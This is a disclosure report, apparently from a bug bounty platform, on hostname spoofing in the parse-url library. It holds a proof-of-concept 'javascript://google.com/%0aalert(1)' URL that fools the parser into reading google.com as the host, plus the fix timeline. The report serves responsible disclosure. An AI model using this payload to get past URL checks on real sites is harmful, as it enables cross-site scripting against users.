hostname spoofing via javascript in ionicabizau/parse-url

Valid

Reported on

Mar 4th 2022


Description

If use parse-url for security check on url, it is dangerous because hostname spoofing through JavaScript scheme is possible. It also occurred in url.parse() of node.js in 2018, and node.js acknowledged the vulnerability for this. So Node.js has patched it, and there are cases where a CVE was issued after the security release.

sh-3.2$ node -e 'console.log(require("url").parse("javascript://google.com/%0aalert(1)"))'
Url {
  protocol: 'javascript:',
  slashes: null,
  auth: null,
  host: null,
  port: null,
  hostname: null,
  hash: null,
  search: null,
  query: null,
  pathname: '//google.com/%0aalert(1)',
  path: '//google.com/%0aalert(1)',
  href: 'javascript://google.com/%0aalert(1)'
}
sh-3.2$

First of all, the above result is the result of url.parser() of node.js. If hostname is passed, it is recognized as a path.

Proof of Concept

sh-3.2$ node -e 'const parseUrl = require("parse-url"); console.log(parseUrl("javascript://google.com/%0aalert(1)"))'
{
  protocols: [ 'javascript' ],
  protocol: 'javascript',
  port: null,
  resource: 'google.com',
  user: '',
  pathname: '/%0aalert(1)',
  hash: '',
  search: '',
  href: 'javascript://google.com/%0aalert(1)',
  query: [Object: null prototype] {}
}
sh-3.2$

But unlike parse-url in node.js, it parses hostname correctly.

Refer to CVE-2018-12123

We are processing your report and will contact the ionicabizau/parse-url team within 24 hours. 5 months ago
Ionică Bizău (Johnny B.) validated this vulnerability 5 months ago
Pocas has been awarded the disclosure bounty
The fix bounty is now up for grabs
We have sent a fix follow up to the ionicabizau/parse-url team. We will try again in 7 days. 5 months ago
We have sent a second fix follow up to the ionicabizau/parse-url team. We will try again in 10 days. 5 months ago
We have sent a third and final fix follow up to the ionicabizau/parse-url team. This report is now considered stale. 4 months ago
Ionică Bizău (Johnny B.) confirmed that a fix has been merged on 21c72a a month ago
Ionică Bizău (Johnny B.) has been awarded the fix bounty
to join this conversation